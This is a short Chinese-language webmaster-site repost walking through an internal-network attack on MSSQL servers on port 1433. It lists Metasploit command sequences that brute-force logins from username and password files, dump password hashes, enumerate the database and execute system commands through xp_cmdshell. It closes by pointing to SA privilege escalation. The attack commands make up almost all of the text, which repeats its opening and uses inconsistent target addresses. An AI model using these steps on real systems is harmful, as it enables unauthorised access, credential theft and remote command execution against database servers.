加入收藏 | 设为首页 | 会员中心 | 我要投稿 汽车网 (https://www.0577qiche.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > MsSql教程 > 正文

内网渗透-1433端口渗透经过

发布时间:2023-03-13 11:25:58 所属栏目:MsSql教程 来源:
导读:在内网环境中收集开放1433端口的服务器:2.1利用msf爆破1433端口:192.168.10.251(1)useauxiliary/scanner/mssql/mssql_login(2)setRHOSTS192.168.109.139(3)setU

1.在内网环境中收集开放1433端口的服务器:
在内网环境中收集开放1433端口的服务器:2.1利用msf爆破1433端口:192.168.10.251(1)useauxiliary/scanner/mssql/mssql_login(2)setRHOSTS192.168.109.139(3)setU

1.在内网环境中收集开放1433端口的服务器:

2.针对开放1433端口的服务器开始渗透:
2.1利用msf 爆破1433端口:192.168.10.251
(1)use auxiliary/scanner/mssql/mssql_login (2)set RHOSTS 192.168.109.139 (3)set USER_FILE /home/xh/shentou/usr_MysqL.txt (4)set PASS_FILE /home/xh/shentou/pwd_MysqL.txt (5)run

2.2查找/捕获服务器的口令
(1)use auxiliary/scanner/mssql/mssql_hashdump (2)set RHOSTS 192.168.10.251 (3)set PASSWORD 123456 (4)run

2.3浏览MSsql
(1)use auxiliary/admin/mssql/mssql_enum (2)set RHOSTS 192.168.10.236 (3)set PASSWORD 123456 (4)run

2.4重新载入xp_cmd功能
(1)use auxiliary/admin/mssql/mssql_exec (2)set CMD 'ipconfig' (3)set RHOSTS 192.168.10.251 (4)set PASSWORD 123456 (5)run

3.后面是利用SA用户进行系统提权
 

(编辑:汽车网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章